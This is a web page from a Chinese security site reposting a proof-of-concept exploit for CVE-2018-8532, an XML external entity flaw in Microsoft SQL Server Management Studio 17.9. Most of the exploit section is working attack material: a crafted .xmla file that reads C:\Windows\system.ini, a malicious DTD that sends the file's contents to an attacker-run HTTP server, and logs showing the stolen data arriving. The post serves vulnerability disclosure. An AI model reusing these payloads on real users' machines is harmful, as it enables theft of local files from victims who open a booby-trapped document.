首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Microsoft SQL Server Management Studio 17.9 - '.xmla' XML External Entity Inject 来源：hyp3rlinx.altervista.org 作者：hyp3rlinx 发布时间：2018-10-12   # Exploit Title: Microsoft SQL Server Management Studio 17.9 - '.xmla' XML External Entity Injection # Date: 2018-10-10 # Author: John Page (aka hyp3rlinx) # Website: hyp3rlinx.altervista.org # Venodor: www.microsoft.com # Software: SQL Server Management Studio 17.9 and SQL Server Management Studio 18.0 (Preview 4) # CVE: CVE-2018-8532 # References: # http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XMLA-FILETYPE-XML-INJECTION-CVE-2018-8532.txt # https://www.zerodayinitiative.com/advisories/ZDI-18-1132/ # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8532   # Security Issue # This vulnerability allows remote attackers to disclose sensitive information on # vulnerable installations of Microsoft SQL Server Management Studio. User interaction is required to # exploit this vulnerability in that the target must visit a malicious page or open a malicious file.   # The specific flaw exists within the handling of XMLA files. Due to the improper restriction of # XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to # access the URI and embed the contents back into the XML document for further processing. An attacker can leverage # this vulnerability to disclose information in the context of the current process.   # PoC # 1) python -m SimpleHTTPServer # 2) "test.xmla"   <?xml version="1.0"?> <!DOCTYPE tastyexploits [ <!ENTITY % file SYSTEM "C:\Windows\system.ini"> <!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd"> %dtd;]> <pwn>&send;</pwn>   # 3) "payload.dtd"   <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>"> %all;   # Result:   Serving HTTP on 0.0.0.0 port 8000 ... 127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /payload.dtd HTTP/1.1" 200 - 127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 - 127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 -   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Microsoft SQL Server Managemen ·Phoenix Contact WebVisit 6.40. ·Microsoft SQL Server Managemen ·Phoenix Contact WebVisit 29857 ·VLC Media Player 2.2.8 MKV Use ·FluxBB < 1.5.6 - SQL Injection ·DELL EMC OneFS Storage Adminis ·NoMachine 5.3.26 Remote Code E ·Delta Electronics Delta Indust ·Solaris RSH Stack Clash Privil ·MicroTik RouterOS < 6.43rc3 - ·Snes9K 0.0.9z - Buffer Overflo   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved